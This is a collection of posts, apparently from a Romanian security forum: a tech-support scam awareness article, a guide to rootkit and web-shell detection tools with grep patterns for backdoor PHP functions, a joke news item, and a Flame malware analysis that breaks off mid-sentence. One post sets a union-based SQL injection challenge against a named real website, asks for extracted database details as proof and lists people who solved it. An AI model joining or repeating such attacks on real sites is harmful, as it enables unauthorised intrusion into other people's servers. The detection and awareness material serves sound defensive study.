  15. Gata. Astept rezolvarea pe PM.
  16. Sau nu... Target: http://www.medix.com.hr Metoda: Union Based Cerinte: Custom Output: user(),database(),version(); nickname,avatar,tabele, coloane, ce doriti, si un random text; Proof: [TABLE=class: grid, width: 800] [TR] [TD]Solver:[/TD] [TD]Syntax:[/TD] [/TR] [TR] [TD]badluck[/TD] [TD]-[/TD] [/TR] [TR] [TD]ak4d3a[/TD] [TD]-[/TD] [/TR] [TR] [TD]crossbower[/TD] [TD]-[/TD] [/TR] [TR] [TD]Praetorian[/TD] [TD]-[/TD] [/TR] [TR] [TD]denjacker[/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [TR] [TD][/TD] [TD]-[/TD] [/TR] [/TABLE] Site procurat dintr-un challenge de pe HF.
  17. ^ Cu ce chestie mai exact? Problemele de cele mai multe ori tin de incompatibilitati hardware. In rest nu vad ce probleme a-ti putea avea. De preferat inainte uitati`va un metru aici: BackTrack 5 Hardware Compatibility List.
  18. “Hi, I’m calling you from Windows Technical Support!” If you work in IT, or even if you just know computers and the Internet, chances are this line is something you’ve heard before. It’s the opening line from a scam operation that has been underway for many years, mostly out of India, and has managed to get a lot of money from thousands of unsuspecting computer users all around the world. It plays on some very basic fears and uncertainties, and it’s surprisingly effective. Even people whom we would consider smart and intelligent have fallen victim to this type of call. But why are these scam calls so effective, and how do we spot them? And, more importantly, how can you prepare your parents, friends and family, so that if and when they do receive this call, they can quickly identify it as a scam, and they can know why they shouldn’t trust what these people say? Because often times, it’s not enough to just say “Don’t talk to strangers”, you have to be able to explain to them how these people are trying to scam them. So let’s go through the scam to see how it works, and what we can do about it. The scam The basic idea behind this type of call is very simple. These companies are based in foreign countries and pay an army of low salary workers to call random people in the US, Europe, and everywhere else in the developed world. Their goal is to hit someone with a Windows based computer, and by calling a random number in the west, chances are they will hit a potential target. Then, the script they use is aimed at scaring those people into believing what they say, and then fork over cash. But the way they do it is pretty clever, because they use the person’s own computer as part of the scam, by misleading them, and scaring them into compliance. It’s been shown that even people who are aware of phone based scams, and who start off in a skeptical mindset when the call is initiated, can still be tricked into giving them money, because of how effective their technique is. This is why telling your friends to be weary of tech support calls isn’t enough, especially if those people aren’t computer savvy, which is why it may be a good idea to explain to them exactly what they would see when they receive such a call, and what it all means. The way the script goes is usually the same. First, the caller tries to convince you that they are some type of authorized support person. This could be a “Windows Technician” or someone from “Microsoft Windows Support”. The key is to include the word Windows, one of the few computer terms that everyone seems to know. Of course, the first clue that this is a scam is the fact that Microsoft doesn’t call you without you having called them before, and that no support technician will contact you about potential problems about your home system, since no one outside your house should have access to your computer in the first place. Unfortunately, this isn’t a very good argument for most people, because they are so used to having support technicians at work who do have access to their systems, and after seeing so many scary hacking related news bulletins in mainstream media, most people would have no trouble believing someone who tells them that their home computer, the one they bought themselves, is actually communicating with some support firm in another country, one that they never even heard of. After convincing you that he or she is indeed a support technician calling to help out, the scammer will painstakingly make you follow a series of steps, all of which are designed to show you that your computer is filled with malware. They basically make you open the Event Viewer, something that comes with every version of Windows, and show you the application log. There, to the victim’s shock, the display is filled with scary messages, including errors, critical events, and so on. This is the main argument behind most of these scams, and the final nail in the coffin to convince non-savvy computer users that their computer is about to choke down under a pile of malware. If someone makes it all the way to this step in the script, then chances are they will be eager for the mysterious caller to give them a solution. This, of course, comes in the form of a useless piece of software that the scammer sells to the victim, sometimes even a monthly payment, and the shady business made yet another customer. How to deal with it Obviously, the best ultimate outcome for this type of shady business is to shut them down, so that they can’t do this to other people. Unfortunately, that’s really hard to do, because these companies can spring up out of nowhere in a matter of days. Just this month the US government was announcing massive lawsuits against some of these very scammers, but like in many other cases, the criminals can restart their operations much faster than the law can close them down. So instead, it’s up to us, IT pros and other savvy Internet users, to make sure these scammers don’t get our families and friends, by educating them. First, we have to understand what the scammers are doing, and then be able to explain why it’s not what it appears to be. The main point of this scam is to scare the target user, by showing them the Event Viewer. The purpose of the Event Viewer is to log everything happening inside of a system. This is a tool that server administrators use all the time, and even support technicians, but normal computer users don’t even know about. Because a computer is such a complex piece of electronics, and modern software is so complex, any normal computer is bound to have situations come up where an error, a warning, or even a critical situation may happen, without the end user ever even noticing. That’s because Windows, like all modern operating systems, is very good at handling errors and recovering from them. If you load the Event Viewer on your own system, you can look through these logs and see the types of errors they are. Usually, they are drivers that haven’t initialized correctly, or applications that didn’t uninstall completely. They are basically events that should not have occurred, but often don’t impact the overall system too much. First, it’s important not to lie to ourselves. It’s not normal to see so many error messages anywhere on a computer. In an ideal world, these logs would have nothing but information notices, with no error, and no warning. But we don’t live in a perfect world. Ask yourself, and the person whom you’re trying to convince, how many times they’ve downloaded something, installed a piece of software, or deleted a file. Even if everything seemed to go well on the surface, things may be left behind the scenes, and that’s where errors come from. But the reason their system didn’t alert them is because it’s something they recovered from. So you shouldn’t be scared into thinking your computer is having major troubles simply because the Event Viewer detected some errors. But it’s also important not to minimize the importance of the malware threat. People are constantly reminded how important updates are, that everyone should be running antivirus software, and so on. So the right way to convince someone not to fall for these types of scams isn’t to make light of the potential threat, but instead show them how they can be secure for free, without ever paying a dime. You can download the free Microsoft Security Essential program, or any of the other free security solutions. The important thing to remember is that those scammers all want the exact same thing, money. So people should always wait before forking away cash, even if they are unsure whether their computer is infected or not, and instead look for free solutions, because in almost every case there’s free alternatives. Other similar scams Understanding the Event Viewer, the fact that every system has errors, and that they aren’t an indication that the computer is infected or having critical problems, is the key to defeating this kind of phone based scam. But there are other scams out there which use similar, but slightly different arguments, which people also need to look out for. It’s really too bad that this type of education has to be done on non-techie users, but at the end of the day, it’s important to remind ourselves just how much of our daily lives are spent in front of a computer, and how dependent we’ve become on them. One very popular online scam is the fake antivirus. This is a popup you may have come across if you go to some of the more shady sites, or simply happened to visit a web site that happened to have been hacked. The basic idea behind this scam is the same, the goal is to scare the user in thinking his or her computer is filled with malware, and to fork over cash in order to protect them. Of course, the results shown on the screen are complete lies, but the display looks very genuine. A non-techie user would not know the difference. Here, you can’t really claim that those messages aren’t malware notices, so people need other information to detect these scams. The first thing to tell others is to pay attention to which security software is installed on their system. Whether they use Symantec, Microsoft, or AVG, they each have their own unique looks and feel. It’s important that everyone takes the time to look over the various dialogs that their security solutions can show them, and remember what they look like. That way, if some generic “Antivirus 2010? window pops up, they will know right away that it’s a scam. Also, be weary of anything that looks out of the ordinary. If a scan suddenly appears on your computer when it usually shouldn’t be happening, then maybe that’s not what it appears to be. In the end, all of these scams and money grabbing attempts are pretty easy to spot for us geeks, but the problem is that the people behind these attacks aren’t concerned about us. They go after the much greater quantity of non-geeks, people who are otherwise intelligent but simply do not understand computers as well as we do, and it’s up to us to educate them, to show them why something isn’t what it claims to be, and how to stay safe without giving out money to shady businesses who don’t deserve it. Sursa InfoSec Institute Resources - How to Spot Phone Based Support Scams, and Why They Work So Well
  19. A lot of sniffers, rootkits, botnets, backdoor shells and malwares are still on the wild today, which are used by malicious attackers after successfully pawning a certain server or any live network in order to maintain their access, elevate their access privilege, and spy other users in a network. In order to protect our network or server from such intrusions and further damage, there are free and open source detection tools that can be deployed and used as part of our security strategy. They are mandatory when our server or network is up and running, especially if a certain user is downloading a file which could possibly be malicious or harmful. The advantage of using free and open source detection tools is that you obviously don’t need to pay a single penny and that tutorials are very easy to get and understand because manuals are included which are usually named as README so be sure to RTFM (Read the F****** Manual). Here are some tools which could be of use to you guys: Chkrootkit Chkrootkit or Check Rootkit is a common open source program or tool used for scanning rootkits, botnets, malwares, etc. in your Unix/Linux server or system. It is fully tested on: Linux 2.0.x, 2.2.x, 2.4.x, 2.6.x, and 3.x.x, FreeBSD 2.2.x, 3.x, 4.x, 5.x and 7.x, OpenBSD 2.x, 3.x and 4.x., NetBSD 1.6.x, Solaris 2.5.1, 2.6, 8.0 and 9.0, HP-UX 11, Tru64, BSDI and Mac OS X. This tool is pre-installed in BackTrack 5 under Anti-Virus Forensic Tools. To install chkrootkit on a Ubuntu or Debian based distro, you can just type : sudo apt-get install chkrootkit To start checking for possible rootkits and backdoors in your system, type the command: sudo chkrootkit Here are other options you can use after issuing the command sudo chkrootkit -h: -h show the help and exit -V show version information and exit -l show available tests and exit -d debug -q quiet mode -x expert mode -e exclude known false positive files/dirs, quoted, space separated, READ WARNING IN README -r dir use dir as the root directory -p dir1:dir2:dirN path for the external commands used by chkrootkit -n skip NFS mounted dirs Rootkit Hunter Rootkit hunter or rkhunter is an Open Source General Public License (GPL) Rootkit Scanner similar to chkrootkit which is also pre-installed in BackTrack 5 under Anti-Virus Forensic Tools. This tool scans for rootkits, backdoors and local exploits by running tests like: MD5 hash compare, look for default files used by rootkits, wrong file permissions for binaries, look for suspected strings in LKM and KLD modules, look for hidden files, and optional scan within plaintext and binary files. To install rkhunter on a Ubuntu or Debian based distro, you can just type : sudo apt-get install rkhunter To start the scanning in your file system, type the command: sudo rkhunter –check And if you want check for updates, issue the command: sudo rkhunter –update After rkhunter has finished scanning your file system, all the results are logged at /var/log/rkhunter.log. Here are other useful options for rkhunter as shown in the -h flag: –append-log Append to the logfile, do not overwrite –bindir <directory>… Use the specified command directories -C, –config-check Check the configuration file(s), then exit –cs2, –color-set2 Use the second color set for output –configfile <file> Use the specified configuration file –cronjob Run as a cron job –dbdir <directory> Use the specified database directory –debug Debug mode –disable <test>[,<test>...] Disable specific tests –display-logfile Display the logfile at the end –enable <test>[,<test>...] Enable specific tests –hash {MD5 | SHA1 | SHA224 | SHA256 | SHA384 | SHA512} Use the specified file hash function –list [tests | languages | List the available test names, languages, checked rootkits | perl] for rootkits, or perl module status, then exit -l, –logfile [file] Write to a logfile (Default is /var/log/rkhunter.log) –noappend-log Do not append to the logfile, overwrite it –nocf Do not use the configuration file entries for disabled tests (only valid with –disable) –nocolors Use black and white output –nolog Do not write to a logfile –nomow, –no-mail-on-warning Do not send a message if warnings occur –ns, –nosummary Do not show the summary of check results –novl, –no-verbose-logging No verbose logging –pkgmgr {RPM | DPKG | BSD | Use the specified package manager to obtain or SOLARIS | NONE} verify file property values. (Default is NONE) –propupd [file | directory | Update the entire file properties database, package]… or just for the specified entries -q, –quiet Quiet mode –rwo, –report-warnings-only Show only warning messages -r, –rootdir <directory> Use the specified root directory –sk, –skip-keypress Don’t wait for a keypress after each test –summary Show the summary of system check result –syslog [facility.priority] Log the check start and finish times to syslog –tmpdir <directory> Use the specified temporary directory –unlock Unlock (remove) the lock file –vl, –verbose-logging Use verbose logging (on by default) -V, –version Display the version number, then exit –versioncheck Check for latest version of program -x, –autox Automatically detect if X is in use -X, –no-autox Do not automatically detect if X is in use ClamAV ClamAV is a known open source anti-virus software in Linux. It is the most famous Linux anti-virus which has a GUI version now designed for detecting Trojans, viruses, malware and other malicious threats easier. ClamAV can also be installed in Windows, BSD, Solaris and even in MacOSX. Fellow security researcher Dejan Lukan has a detailed tutorial here in InfoSec Institute Resources page on how to install ClamAV and how to work with its command line interface. BotHunter BotHunter is a network-based botnet diagnosis system which tracks the two-way communication flows between your personal computer and the Internet. It is developed and maintained by the Computer Science Laboratory, SRI International and available for Linux and Unix but now they have released a Private Test Release and a Pre-Release for Windows. You can download this software here. You could also check its addon which is called BotHunter2Web.pl. This addon converts BotHunter infection profiles into web pages, which can be viewed through your browser directly or via private webserver. BotHunter infection profiles are typically located in ~cta-bh/BotHunter/LIVEPIPE/botHunterResults.txt. Sample Usage for BotHunter2Web.pl: perl BotHunter2Web.pl [-date YYYY-MM-DD] -i sampleresults.txt Additional Options and Switches: -h — help message -date YYYY-MM-DD — [or TODAY, YESTERDAY]. Blank = build one massive table -i FILE — BotHunter profile file (e.g., botHunterResults.txt) -wl <filename> — A list of victim IPs you wish to surpress from the HTML table -outdir <path> — Output Directory(default = current dir) -MaxEvents N — Max number of event entries per row -MaxCC N — Max number of CC entries per row -lookup — Perform nslookup on victim IP avast! Linux Home Edition avast! Linux Home Edition is an anti-virus engine offered free of charge but only for home and not for commercial use. It includes a command line scanner and based on my experience it detects some of the Perl IRC bots I have been collecting like w3tw0rk’s modified IRC (Internet Relay Chat) bot (originally made by Pitbul) that contains malicious functions like udpflood & tcpflood functions and allows its master or bot controller to execute arbitrary commands with the use of the system() function for Perl. You can download this antivirus software here. NeoPI NeoPI is a Python script which is useful for detecting obfuscated and encrypted content within text or script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code. The development focus of NeoPI was creating a tool that could be used in conjunction with other established detection methods such as Linux Malware Detect or traditional signature or keyword based searches. It is a cross platform script for Windows and Linux. Not only does it aid users to detect possible backdoor shells but also malicious scripts like IRC botnets, udpflood shells, vulnerable scripts, and other malicious stuffs. To use this Python script, just checkout the code in its official github site and navigate through its directory: git clone https://github.com/Neohapsis/NeoPI.git cd NeoPI Then we use the -h flag to see the options for running the script: shipcode@projectX:/opt/NeoPI$ sudo ./neopi.py -h Usage: neopi.py [options] <start directory> <OPTIONAL: filename regex> Options: –version show program’s version number and exit -h, –help show this help message and exit -c FILECSV, –csv=FILECSV generate CSV outfile -a, –all Run all (useful) tests [Entropy, Longest Word, IC, Signature] -z, –zlib Run compression Test -e, –entropy Run entropy Test -E, –eval Run signature test for the eval -l, –longestword Run longest word test -i, –ic Run IC test -s, –signature Run signature test -S, –supersignature Run SUPER-signature test -A, –auto Run auto file extension tests -u, –unicode Skip over unicode-y/UTF’y files Based on the options above, if we want to run all tests like Entropy, Longest Word, IC, Signature and run auto file extension tests in the /var/www directory, we can just issue the command: sudo ./neopi.py -a -A /var/www If you want to generate a CSV outfile for future references, we can use the command: sudo ./neopi.py -C outfile.csv -a -A /var/www Two security researchers (Scott Behrens and Ben Hagen) here in InfoSec Institute and the original developers of the NeoPI project have also written a detailed tutorial entitled ‘Web Shell Detection Using NeoPI‘ which explains Entropy, Longest Word, IC, Signature and other useful tests. Ourmon Ourmon is a Unix-based open source program and a common network packet sniffing tool in FreeBSD but it can also be used for detecting botnets as explained by Ashis Dash in his article entitled ‘Botnet detection tool: Ourmon‘ in Clubhack Magazine or Chmag. Grep And the last but not the least, we have the grep command which is a powerful command-line tool in Unix and Linux. It is used for searching and probing data sets for lines that matches a regular expression. As a short history, this utility was coded by Ken Thompson on March 3, 1973 for Unix. Nowadays, Grep is known for detecting and searching for pesky backdoor shells and malicious scripts too. Grep can also be used for detecting vulnerable scripts (e.g the PHP function shell_exec which is a risky PHP function that allows remote code execution or command execution). We can use the grep command to search for the shell_exec () function as our advantage in our /var/www directory to check for possible PHP files that are vulnerable to RCE or command injection. Here is the command: grep -Rn “shell_exec *( ” /var/www Backdoor shells commonly use the shell_exec function for executing arbitrary commands. Aaside from shell_exec function, most PHP backdoor shells also use functions like base64_decode, eval, phpinfo, system, php_uname, chmod, fopen, fclose, readfile, edoced_46esab, and passthru. Thus you could also easily grep these functions: grep -Rn “shell_exec *(” /var/www grep -Rn “base64_decode *(” /var/www grep -Rn “phpinfo *(” /var/www grep -Rn “system *(” /var/www grep -Rn “php_uname *(” /var/www grep -Rn “chmod *(” /var/www grep -Rn “fopen *(” /var/www grep -Rn “fclose *(” /var/www grep -Rn “readfile *(” /var/www grep -Rn “edoced_46esab *(” /var/www grep -Rn “eval *(” /var/www grep -Rn “passthru *(” /var/www In my recent researches, most Perl IRC botnets use common Perl functions like shell, system, and tcp so we can actually grep these functions just like hunting or detecting PHP backdoor shells. Thus, if we want to scan our /var/www directory again then we could just issue the commands below: grep -Rn “shell *(” /var/www grep -Rn “tcp *(” /var/www grep -Rn “system *(” /var/www Grep is such a good tool for manual detection and forensic analysis . References: Linux Detecting / Checking Rootkits with Chkrootkit and rkhunter Softwarehttps://github.com/Neohapsis/NeoPIBotHunter2Web Distribution PageInfoSec Institute Resources – Open Source Antivirus: ClamAVhttp://pentestlab.org/hunting-malicious-perl-irc-bots/ The Official ROOTCON Blog: Simple Kung Fu Grep for Finding Common Web Vulnerabilities & Backdoor ShellsInfoSec Institute Resources – Web Shell Detection Using NeoPI Sursa InfoSec Institute Resources - Free & Open Source Rootkit and Malware Detection Tools
  20. Asta clar nu inseamna ca a spart serverele Google. Mie imi suna mai mult a Un haker român în vîrsta de 24 de ani a fost dat în urm?rire general? de c?tre FBI dup? ce NASA a reclamat c? o persoan? necunoscut? a reu?it s? treac? de toate sistemele de securitate ?i a spart mai multe geamuri, multe dintre ele scumpe, printre care ?i geamul pe care a vomitat Neil Armstrong la întoarcerea din studioul de televiziune în care a filmat aselenizarea. Potrivit primelor informa?ii, infrac?iunea ar fi fost descoperit? miercuri diminea?? la scurt timp dup? ce Aurel Onofra?, de profesie ?omer, fusese v?zut jucîndu-se cu mingea periculos de aproape de geamurile institu?iei. Contactat telefonic, Onofra?, care momentan se ascunde la Râmnicu Vâlcea sub identitatea unui alt haker, în speran?a c? îi va inducere în eroare pe anchetatori, ?i-a m?rturisit fapta spunînd c? a fost obligat s? sparg? geamurile acelea deoarece era singurul lucru de la NASA pe care nu reu?ise înc? s?-l sparg?. “Îmi place s? cred c? am tras un semnal de alarm? ?i am trimis un mesaj destul de puternic: nu v? mai pune?i termopane ieftine cump?rate de pe Valea Cascadelor. Sper ca oamenii de la NASA s? aprecieze gestul meu ?i s? m? angajeze s? le montez ni?te geamuri noi. ?ti?i, eu de meserie sînt geamgiu, dar de plictiseal? mai sparg ?i servere. Apropo de asta, poate c? nu le-a? mai sparge serverele atît de des dac? ?i-ar schimba ?i ei parola de acces din “forzzasteaua” în ceva mai greu de ghicit, de exemplu “1234””. Cunoscut în lumea hakerilor sub aliasul “Aurelian Onofra?”, Aurel Onofra? nu se afl? la prima isprav? de acest fel, anul trecut vâlceanul reu?ind s? sparg? o vaz? la Pentagon, o lustr? la Casa Alb? ?i mai multe pahare la Palatul Cotroceni.
  21. It is not possible to talk about cyber warfare and cyber weapons without mentioning the famous Stuxnet virus and the series of state-sponsored malware developed in the same period, using a common development platform with different purposes. Stuxnet is considered the first cyber weapon detected, and since then, many tools of cyber espionage have been used by governments to steal sensitive information and intellectual property of foreign government, agencies, and enterprises. The first malware developed with this intent by a government appeared to be Duqu, an agent designed by the same authors of Stuxnet and realized using the same development framework named “Tilded platform”. Last May, the Iranian Computer Emergency Response Team (MAHER) detected a new targeted malware which hit the country. It has been named Flame (also known as Flamer or Skywiper) due the name of its main attack module. In the same hours, CrySyS Lab and Kaspersky Lab published news regarding the new malware that has been detected and has hit mainly Windows systems of the Middle East area, specifically Iran. Coincidence or planned communication strategy? Figure – Flame Source Code The discovery was made by Iranian scientists during the investigation on the malicious agents Stuxnet and Duqu, and what surprised them was the capability of the malware to dynamically change its behavior, including receiving and installing specific modules designed to address specific targets. But what really surprised the world wide security community was the capability of Flame to be undetectable by all the principal antivirus software for a long period of time. This very anomalous circumstance induced conjecture of the collaboration of the principal security firms to avoid the malware’s detection to advantage its spread. The prompt response of the major security firms and the certainty that the malware is dated at least to 2010, would give cause to think that the companies were aware of the project Flame and have been silent in agreements with Western governments. Some months before the discovery of Flame, Western countries had decided to suspend the supply of antivirus systems to Iran for penalty, forcing the country to develop its own antivirus. How is it possible that the Iranian Computer Emergency Response Team anticipated the world wide community and was first to discover the agent? The malware infected mainly Windows platforms running Windows XP, Vista and Windows 7, gathering information from the victims in different modes such as sniffing network traffic, taking screenshots, recording audio conversations and intercepting the keyboard. Once collected, the information was sent by the agent to the command-and-control servers. Flame is considered a complex malware realized with the primary intent to create a comprehensive cyber espionage tool kit. The following list gives some features of the malware listed in the official announcement of MAHER center: Distribution via removable medias Distribution through local networks Network sniffing, detecting network resources and collecting lists of vulnerable passwords Scanning the disk of infected systems, looking for specific extensions and contents Creating series of user’s screen captures when some specific processes or windows are active Using the infected system’s attached microphone to record the environment sounds Transferring saved data to control servers Using more than 10 domains as C&C servers Establishment of secure connection with C&C servers through SSH and HTTPS protocols Bypassing tens of known antiviruses, anti malware and other security software Capable of infecting Windows XP, Vista, and 7 operating systems Infecting large scale local networks The Iranian Government sustains that the malware is a new cyber weapon due to its complexity level and propagation methods observed. It didn’t exclude that a mass data loss in Iran was related to the attack of the same malware. The nature of the systems targeted and the geographic distribution of the malware, the Middle East, combined with the high level of sophistication, according the opinion of many security experts, are clear clues that the malicious software was developed by a foreign state that intents to hit a specific country in that region of the globe. Kaspersky Team defined Flame as a sophisticated attack toolkit which condenses the characteristics of a backdoor, a Trojan, and a worm able to spread itself within a local network and on removable media. Figure – Geographic Distribution of Flame malware according Kaspersky Lab The first investigations demonstrated that Flame was active since 2010, exactly the same period of Stuxnet, and according the opinion of the analysts at Kaspersky Labs, both projects were produced by two separate, skilled teams of professionals that in the design phase of the malware have had the opportunity to collaborate. Despite Kaspersky team sustaining that Flame is an advanced cyber espionage tool, there is a strange particular that raised doubts on the capability of Flame to remain undetected for a so long time: its size is anomalous for a stealth espionage toolkit. The total dimension of the malware is almost 20 MB, a considerable size motivated by the presence of many different libraries and of a LUA virtual machine. This last feature is another distinctive element that represents an innovation and makes me believe that the developers behind the agents are professionals. The choice of the scripting language is mainly motivated by the following factors: Complete portability of the source code and simple integration with C and C++ languages. It is a dynamic programming language. The LUA virtual machine is extremely compact, less than 200Kb. LUA is a cross-platform scripting language with “extensible semantics” and its usage is uncommon for malware development. Flame is composed by several modules written using the scripting language and interfacing it with subroutines and libraries compiled from C++. Who is behind Flame? Though difficult to say exactly who has developed the malware, for sure it’s a state-sponsored project and it has been developed with the specific intent to attack countries in Middle East exactly in same way of Stuxnet. To better understand Flame, let’s analyze the story of the famous Stuxnet, finding the correlations between the two malware. The worldwide security community suggested the US as the authors of the Stuxnet, which the US government has consistently denied, leading suspicions to the work of Israel intelligence. According an article published by The New York Times, adapted from journalist David Sanger’s forthcoming book, Confront and Conceal: Obama’s Secret Wars and Surprising Use of American Power, both the US and Israeli governments developed and deployed Stuxnet. The planning of the deadly cyber weapon started under the administration of George W. Bush as part of a military operation named “Olympic Games”, but the Obama administration has been putting more energy into the offensive program. The response of the US Government to this article’s revelation on the “Olympic Games” secret project has been an internal investigation on the leaks of classified information on the development, instead of an official denial of the claims. The Kaspersky team demonstrated a strong correlation between Stuxnet and Flame, also highlighting deep differences between the malicious codes. First of all, Stuxnet is considered the first cyber weapon designed to destroy the Iranian nuclear program, infecting Scada systems inside nuclear plants. Meanwhile, Flame is a sophisticated tool for cyber espionage. Stuxnet appears to be designed using the famous Tilded platform, but Flame and the products of Tilded framework, such as Duqu, are completely different because they are based on different architectures. Flame never used system drivers, while Stuxnet and Duqu’s main method of loading modules for execution is via a kernel driver. The presence of the US behind the development of Flame is not surprising. Cyber espionage is one of the main activities covered by every cyber strategy, through which it tries to silently steal confidential information, technologies and intellectual property. The ability to infiltrate enemy networks, stealing classified information, represents a major advantage for those who lead the offensive. Stuxnet was created in the first half of the 2009, when, according to Kaspersky researchers, the Flame platform was already in existence. One of the most sensational discoveries is that a Stuxnet instance dated 2009 used a module built on the Flame platform. This module was specifically developed to operate with Stuxnet malware and was removed in the successive versions. The Flame module found in Stuxnet exploited a 0-day vulnerability enabling an escalation of privileges, presumably exploiting MS09-025. Kaspersky expert Roel Schouwenberg noted that no Flame components have been used in more advanced versions of Stuxnet: “Flame was used as some sort of a kick-starter to get the Stuxnet project going,” he stated. “As soon as the Stuxnet team had their code ready, they went their way.” In the successive version of Stuxnet, a new module has been found to have substituted it and to empower the propagation of the agent exploiting the vulnerability MS10-046 instead of the “old” autorun.inf. Starting from 2009, the evolution of the two projects has proceeded independently. This circumstance supports the hypothesis that behind Stuxnet and Flame there were two distinct groups of development named by Kaspersky “Team F” (Flame) and “Team D” (Tilded). Kaspersky CEO Eugene Kaspersky declared:“there were two different teams working in collaboration.” Resuming the development team, authors of the malware have started operations since 2007-2008 at the latest. The presence of the component from the Flame platform in Stuxnet demonstrates the collaboration between the groups, but since 2010, the platforms have been developing independently from each other. The only similitude observed between instances dated after 2010 is that both teams have been exploiting the same vulnerabilities. Figure – Relationship of Stuxnet, Duqu, Flame and Gauss, according Kaspersky It’s not yet clear why two different groups of experts working for governments have developed two distinct agents with common features. The following are some possible explanations: Creators of Stuxnet removed Flame components to avoid being discovered in case of failure of the cyber attack against the Iranian nuclear program. The teams are working for different states that have joined the effort to speed-up the creation process of a cyber weapon. Let’s recall that many security experts have alerted the international community regarding the risk that Iran could create its nuclear arsenal within a couple of years, making the time factor determinant. Flame today … and the news on an alleged agent still in the wild After months of investigation conducted by the Kaspersky team in collaboration with Symantec, ITU-IMPACT and CERT-Bund/BSI, the researcher Kaspersky analyst Dmitry Bestuzhev has cracked the password protecting the Flame command and control server, obtaining access to the malware control panel. The C&C servers discovered were owned by a European company with data centers in another European Union country. The revelations were sensational as predicted. The forensic analysis of the command & control servers revealed an additional three unidentified pieces of malware under the control of the attackers, but the alarming discovery is related to an alleged agent still in the wild. According to the last investigation, the first use of Flame, initially thought to have begun in 2010, appeared to be in 2006. Going deep in the analysis, the group of security analysts get a server image which was an OpenVZ file-system container, an operating system-level virtualization technology based on the Linux kernel and operating system. OpenVZ allows a physical server to run multiple isolated operating system instances, but it made forensic analysis difficult. The study demonstrated that the authors of malware have intentionally tried to cover tracks of their operations by providing fake clues to disorient the analysts. For example, the C&C servers present an elementary structure and look and feel to give the impression that it had been prepared by script kiddies, equipped with a simple and anomalous botnet control panel. A very interesting feature of the botnet is the way the C&C instructs the bots that don’t receive the command directly by the console, but attackers uploaded specially crafted tar.gz archives containing scripts that were processed by the server. The server extracted script from the archive looking for *.news and *.ad files located in specific directories. The priority and target client ID were stored in the filename uploaded to a C&C server with following convention: [I]<random_number>_<user_type>_<user_id>_<priority>.<file extension>[/I] Going deep in the code analysis, the researchers discovered that C&C servers were able to use a different communication protocol, probably used to “converse” with different clients. The protocols discovered are respectively dedicated to four different types of malware: SP, SPE, FL and IP, where FL stands for Flame, and according to the code analyzed, the remaining clients are similar agents. The protocols are: OldProtocol OldProtocolE SignupProtocol RedProtocol (mentioned but not implemented) Figure – Clients and Protocols relations found in this C&C server – Kaspersky Redirecting the Botnet traffic to a “sinkhole” to oversee traffic from infected machines and prevent further distribution of malware and scams, the researchers have distinguished two different streams of data respectively related to Flame and to another, the SPE malware client demonstrating that it is operating in the wild. Data on the traffic directed to the C&C servers, starting on March 25th, during a week, revealed 5377 unique IP addresses connected to the server located in Europe. 3700 connections were originated from Iran and around 1280 from the Sudan. Less than 100 connections were made from other countries such as United States, Germany and India. A region targeted and number of infections related to specific countries gives indication of a state-sponsored intelligence operation conducted against Iran and Sudan. Figure – Client and protocol relations found in this C&C servers – Kaspersky One of the most valuable traces left by the four developers in the scripts were their nicknames and internal timestamps, the earliest of which is dated December 3, 2006. Singularly, one of the developers has worked on a majority of the files, demonstrating great experience. Maybe the developer was the team leader, according the report. The study states: “He coded some very smart patches and implemented complex logics; in addition, he seems to be a master of encryption algorithms. We think [the developer] was most likely a team lead.” Other interesting info discovered from the analysis of the C&C servers are the last modification date that is May 18th and the presence of an automated script used to delete log files and disable the logging function. The researchers have found a shred tool also used by the Duqu team was used to wipe information and also some scripts that downloaded new data and removed old data every 30 minutes. Ongoing investigation … new sensational revelations on miniFlame On October 14th Kaspersky Lab has released a new report reporting the results of further investigation conducted on the Command and Control servers and on traffic directed to them. As anticipated the security researchers have detected two different streams of data respectively related to Flame and to another, the SPE malware client demonstrating that it is operating in the wild. Kaspersky’s blog post refers to the SPE agent naming it the “miniFlame”, that is the agent uncovered during the investigation and highlighting that it is a smaller version of Flame module, probably because it was developed before. Don’t let the name fool you; “miniFlame” malware is a fully functional espionage module designed for cyber espionage purposes and implemented as an independent module that is able to operate on infected machines, without the main Flame components acting as a backdoor and allowing remote control by the attackers. Another feature discovered in miniFlame is its ability to operate with Gauss malware, demonstrating a common origin of offensive against the Middle East region. This singular revelation is related to the use of the C&C server; some of them were used exclusively to control the SPE, others to control both SPE and Flame agents. The experts noted that the diffusion of miniFlame was limited with respect to Gauss and Flame, maybe because it has been used as a surgical attack tool on very specific targets that have been considered strategic by the attackers. Figure – Malware diffusion data SPE does not have a clear geographical bias. The researchers found the usage of different modification against different countries such as Lebanon, Iran, Kuwait, Palestine and Qatar. Looking at Sinkhole statistics of miniFlame, it is possible to note that between 28th of May 2012 and September 30th, the servers counted around 14,000 connections in total from about 90 different IPs. Two main locations of victims are Lebanon and Iran. Figure – miniFlame geographic diffusion The researchers discovered ten commands used for malware running and to instruct the agent on cyber espionage operations. What’s about the other malware not yet identified? Researchers believe that SP could be an older version of miniFlame, while IP agent is still under investigation to try to discover its purpose. The paternity of the massive cyber espionage campaign is also still a mystery. The Kaspersky report on the topic states: “With Flame, Gauss and miniFlame, we have probably only scratched the surface of the massive cyber-spy operations ongoing in the Middle East. Their true, full purpose remains obscure and the identity of the victims and attackers remain unknown.” Can be Flame considered a cyber weapon? Flame is not considered at first glance to be a cyber weapon. It doesn’t fit into the following definition, despite being a state-sponsored project: A cyber weapon is “any appliance, device or any set of computer instructions designed to unlawfully damage a computer or telecommunications system having the nature of critical infrastructure, causing huge damage, and to offend the person through cyberspace”. It is a cyber espionage malware, but experts could ignore its modular structure that makes possible the use of its components for offensive purposes, simply loading a module specifically developed to attack critical infrastructures. Kaspersky researcher Schouwenberg said he suspected Flame may be capable of deleting data and attacking industrial control systems. Of course there isn’t evidence right now, but it is a feasible scenario. The expert of Symantec Security firm declared on the argument: “The modular nature of this malware suggests that a group of developers have created it with the goal of maintaining the project over a long period of time; very likely along with a different set of individuals using the malware. The architecture being employed by W32.Flamer allows the authors to change functionality and behavior within one component without having to rework or even know about 